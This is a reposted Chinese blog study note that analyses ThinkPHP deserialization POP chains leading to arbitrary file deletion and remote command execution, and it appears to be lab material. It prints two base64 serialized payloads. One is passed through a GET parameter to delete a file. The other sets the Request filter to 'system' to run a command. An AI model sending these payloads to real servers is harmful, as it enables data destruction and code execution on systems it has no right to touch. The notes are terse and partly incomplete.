欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 产业 > DAY111PHP开发框架THIKNPHP反序列化POP利用链RCE执行文件删除

DAY111PHP开发框架THIKNPHP反序列化POP利用链RCE执行文件删除

2025/5/6 6:45:57 来源:https://blog.csdn.net/m0_74402888/article/details/143708251  浏览:    关键词:DAY111PHP开发框架THIKNPHP反序列化POP利用链RCE执行文件删除

一、文件删除利用链分析

1、__destruct发现调用$this->removeFiles();

2、removeFiles();函数方法file_exists,@unlink($filename);文件删除功能

3、unserialize(base64_decode($_GET['id']));

有可控变量

4、pop文件删除利用链的使用

只有在这个类中调用

Files可控数组

5、Poc实现

路由关系

application/index/controller/Index.php

http://tp-serilize/index.php/index/index/unser?id=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtzOjg6ImQ6XDEudHh0Ijt9fQ==

6、动态调试

二、RCE利用链分析

1、动态调试分析

TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo2OiJjb2xlYWsiO2E6MTp7aTowO3M6MDoiIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NjoiY29sZWFrIjtPOjEzOiJ0aGlua1xSZXF1ZXN0Ijo1OntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjg7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fXM6MTM6IgAqAG1lcmdlUGFyYW0iO2I6MTtzOjg6IgAqAHBhcmFtIjthOjE6e2k6MDtzOjc6Im5vdGVwYWQiO31zOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fX19fX19

从下到上的利用链利用

1、文件删除poc-》rce利用

//__destruct->removeFiles->file_exists->

$filename未对象时候触发__toString

2、__toString利用链分析

//$relation可控,找到一个没有visible方法或不可访问这个方法的类时,即可调用_call()魔法方法

3、call利用链分析

hook[$method], $args

-》$method, $args

4、逆向分析call_user_func

filterValue

5、input方法触发分析

6、param被谁触发

被isAjax触发了

7、call方法调用了

8、利用链不会xie

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词